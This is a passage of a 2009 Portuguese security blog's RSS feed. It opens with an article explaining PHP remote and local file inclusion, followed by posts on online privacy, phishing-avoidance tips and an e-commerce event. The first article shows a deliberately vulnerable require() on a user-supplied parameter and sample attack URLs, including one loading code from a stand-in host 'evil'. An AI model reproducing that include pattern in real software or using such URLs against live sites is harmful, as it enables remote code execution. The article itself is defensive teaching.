Vejamos o código a seguir:</p>
<p><?php<br />
   $color = 'blue';<br />
   if ( isset( $_GET['COLOR'] ) )<br />
      $color = $_GET['COLOR'];<br />
   require( $color . '.php' );<br />
?></p>
<form>
<select name="COLOR">
      <option value="red">red</option><br />
      <option value="blue">blue</option><br />
   </select>
<p>   <input type="submit"><br />
</form>
<p>Colocando red/blue o programador pensou que poderia garantir que somente blue.php e red.php poderiam ser carregados. Porem como qualquer um poderia simplesmente inserir dados arbitrários na variável COLOR, é possivel injetar códigos a partir de arquivos:<br />
•	/vulnerable.php?COLOR=http://evil/exploit   : Isto injetaria um arquivo remoto malicioso<br />
•	/vulnerable.php?COLOR=C:\ftp\upload\exploit : Isto poderia carregar um arquivo que foi feito upload para o server.</p>
<p>Como podem ver as vulnerabilidades relacionadas a dados inseridos como variáveis não validadas podem trazer diversos problemas, em especial a função eval() por ser utilizada em larga escala pode prejudicar consideravelmente a segurança de sua aplicação e servidores.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2009/12/14/vulnerabilidades-com-a-funcao-eval/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Invasão de Privacidade II</title>
		<link>http://blog.trustsign.com.br/2009/11/27/invasao-de-privacidade-ii/</link>
		<comments>http://blog.trustsign.com.br/2009/11/27/invasao-de-privacidade-ii/#comments</comments>
		<pubDate>Fri, 27 Nov 2009 15:06:05 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Artigo de Segurança</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2009/11/27/invasao-de-privacidade-ii/</guid>
		<description><![CDATA[
Qual o interesse em obter suas informações? Porque elas são importantes?
Nunca lhe ocorreu de um dia, de repente, um e-mail surgir em sua caixa postal, e por mais incrível que pareça ele traz informações sobre assuntos de seu interesse, uma promoção imperdível de um produto que você pesquisa há tempos, ou algo parecido?
Há vários interessados [...]]]></description>
			<content:encoded><![CDATA[<p><div class="centralizado"><img src="http://blog.trustsign.com.br/up/t/tr/blog.trustsign.com.br/img/_129_.jpg" alt=" 129  -  129 " title=" 129  -  129 " /></div><br />
Qual o interesse em obter suas informações? Porque elas são importantes?</p>
<p>Nunca lhe ocorreu de um dia, de repente, um e-mail surgir em sua caixa postal, e por mais incrível que pareça ele traz informações sobre assuntos de seu interesse, uma promoção imperdível de um produto que você pesquisa há tempos, ou algo parecido?</p>
<p>Há vários interessados em saber como você gasta seu dinheiro, quais são seus hábitos de consumo, tipos de websites que você visita e muito mais. Isso permite que empresas montem perfis sobre potenciais consumidores e dessa forma aproveitam as oportunidades que o mundo virtual oferece, direcionam suas camapnhas de marketing e tentam propiciar ao internauta maior interatividade e facilidade de navegação.</p>
<p>Websites rastreiam seu computador quando você entra navega nele, a partir daí, links acessados, dias, horários, tempo de exibição, número de clicks, tudo pode ser monitorado. </p>
<p>Quando você se conecta a internet, seu computador ganha um endereço chamado IP ou traduzindo Protocolo de Internet, isso permite também que dados como o país, cidade e tipo de conexão (discada ou banda larga) também sejam identificadas, além disso você utiliza um navegador para acessar os sites, isso também é identificado.</p>
<p>Conforme já mencionado no artigo Invasão de Privacidade I, os sites podem ou não lhe informar de que forma fazem isso, tudo depende da transparência da empresa e essa informação deve estar disponível na Política de Privacidade.</p>
<p>Existem ferramentas e configurações que permitem a você controlar o uso dos arquivos que permitem obter essas informações, mas isso será comentado no próximo post.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2009/11/27/invasao-de-privacidade-ii/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Invasão de Privacidade I</title>
		<link>http://blog.trustsign.com.br/2009/11/19/invasao-de-privacidade-i/</link>
		<comments>http://blog.trustsign.com.br/2009/11/19/invasao-de-privacidade-i/#comments</comments>
		<pubDate>Thu, 19 Nov 2009 17:38:18 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Dicas de Segurança</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2009/11/19/invasao-de-privacidade-i/</guid>
		<description><![CDATA[
Você sabe quais são os métodos utilizados para o roubo de identidade ou informações? Se não sabe, esse artigo é para você&#8230;
A cada dia a quantidade de fraudes e roubos de identidades crescem em um número alarmante, as técnicas para isso? Muitas, vamos nos próximos posts comentar sobre algumas:
Cavalos de tróia, vírus e outros
Seu objetivo [...]]]></description>
			<content:encoded><![CDATA[<p><div class="centralizado"><img src="http://blog.trustsign.com.br/up/t/tr/blog.trustsign.com.br/img/42_21522167.jpg" alt="42 21522167 - 42 21522167" title="42 21522167 - 42 21522167" /></div></p>
<p>Você sabe quais são os métodos utilizados para o roubo de identidade ou informações? Se não sabe, esse artigo é para você&#8230;</p>
<p>A cada dia a quantidade de fraudes e roubos de identidades crescem em um número alarmante, as técnicas para isso? Muitas, vamos nos próximos posts comentar sobre algumas:</p>
<p><strong>Cavalos de tróia, vírus e outros</strong></p>
<p>Seu objetivo é o de roubar informações do computador da vítima, danificar arquivos (no caso de vírus) ou usar o computador para sua propagação. São muito comuns em páginas de “phishing”, ou seja, páginas falsas que aparentemente são originais. </p>
<p>Tomemos por exemplo a página de bancos onde você coloca suas informações, você abriu seu navegador e digitou o endereço do banco ou você recebeu um e-mail informando que o banco está recadastrando seus dados e clicou no link que havia lá? Se for a segunda opção certamente você tem um problema. Bancos e instituições sérias como Serasa, TIM, RECEITA FEDERAL e outras, não enviam e-mails com esse objetivo.</p>
<p>Em 99,9% dos casos fraudadores é utilizado esse recurso para roubar senhas e dados restritos dos internautas, dessa forma pessoas sem escrúpulo fingem ser empresas sérias e aproveitam da credibilidade dessas para obter benefícios financeiros.</p>
<p><strong>Algumas dicas para não cair em armadilhas virtuais:</strong></p>
<p>1 – Nunca clique sobre links recebidos por e-mails;<br />
2 – Desconfie de e-mails milagrosos e de pessoas que você não conhece, na dúvida, APAGUE;<br />
3 – Prefira sempre digitar endereço de websites;<br />
4 – Antes de digitar qualquer dado pessoal em uma área do website, tenha a certeza de que está em uma área segura, o que pode ser feito reparando na barra de endereços do navegador, a qual deve mudar de HTTP para HTTPS, aparecendo ainda do lado direito inferior um pequeno cadeado, clique sobre ele e confira se o site em questão realmente pertence a empresa que representa e se é válido;<br />
5 – Na dúvida, antes de qualquer ação entre em contato com o responsável pelo site e pergunte.<br />
Certamente alguns minutos ao telefone são menos inconvenientes do que horas de dor de cabeça por um simples clique.</p>
<p>Nó artigo &#8220;Invasão de Privacidade II&#8221; , que será postado na próxima quarta-feira, dia 25/11, abordaremos “Quais informações os websites colhem e como eles fazem isso”.</p>
<p>Até lá!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2009/11/19/invasao-de-privacidade-i/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Vender Online para Baixa Renda – Evento ClearSale</title>
		<link>http://blog.trustsign.com.br/2009/11/13/vender-online-para-baixa-renta-%e2%80%93-evento-clearsale/</link>
		<comments>http://blog.trustsign.com.br/2009/11/13/vender-online-para-baixa-renta-%e2%80%93-evento-clearsale/#comments</comments>
		<pubDate>Fri, 13 Nov 2009 13:56:07 +0000</pubDate>
		<dc:creator>TrustSign</dc:creator>
		
		<category>Notícias do dia-a-dia</category>

		<guid isPermaLink="false">http://blog.trustsign.com.br/2009/11/13/vender-online-para-baixa-renta-%e2%80%93-evento-clearsale/</guid>
		<description><![CDATA[Dia 05 de novembro aconteceu em São Paulo, no Hotel Intercontinental, o Fórum “Vender online para Baixa Renda”, elaborado pela ClearSale.
O Evento foi conduzido  por Renato Meirelles – Especialista no segmento de baixa renda e, pela Dra. Patricia Peck - advogada de Direito Digital.
Hoje, cerca de *85% da população brasileira pertence às classe C, [...]]]></description>
			<content:encoded><![CDATA[<p>Dia 05 de novembro aconteceu em São Paulo, no Hotel Intercontinental, o Fórum “Vender online para Baixa Renda”, elaborado pela ClearSale.</p>
<p>O Evento foi conduzido  por Renato Meirelles – Especialista no segmento de baixa renda e, pela Dra. Patricia Peck - advogada de Direito Digital.</p>
<p>Hoje, cerca de *85% da população brasileira pertence às classe C, D e E, assim como *69% dos cartões de crédito estão nas mãos desse público. Dessa forma, as empresas que oferecem venda online precisam se adaptar, e dar melhor acesso, a esse perfil de consumidor que atualmente movimenta R$760 bilhões por ano.</p>
<p>Os temas do Fórum, tais como: “Estratégias cognitivas de excelência na autenticação da baixa renda”, “Evolução da baixa renda no comércio eletrônico” e “Entendendo como a baixa renda compra no comércio eletrônico”, foram abordados com riqueza de detalhes, onde trabalhou-se a sensibilidade para com as relações em geral, afinal a internet é “o mundo da confiança” e quando é entendido o perfil dos usuários e consegue-se definir com qual deles a empresa está se comunicando, é muito mais fácil as relações fluirem bem.</p>
<p>Os departamentos de marketing e comercial da TrustSign estavam presentes, disponibilizando informações sobre os serviços que possibilitam a troca mais segura na web e apresentando produtos de qualidade para todos que estão (ou querem entrar) nesse segmento de mercado tão atual e rentável.</p>
<p>*Fonte: Data Popular e Datafolha</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.trustsign.com.br/2009/11/13/vender-online-para-baixa-renta-%e2%80%93-evento-clearsale/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
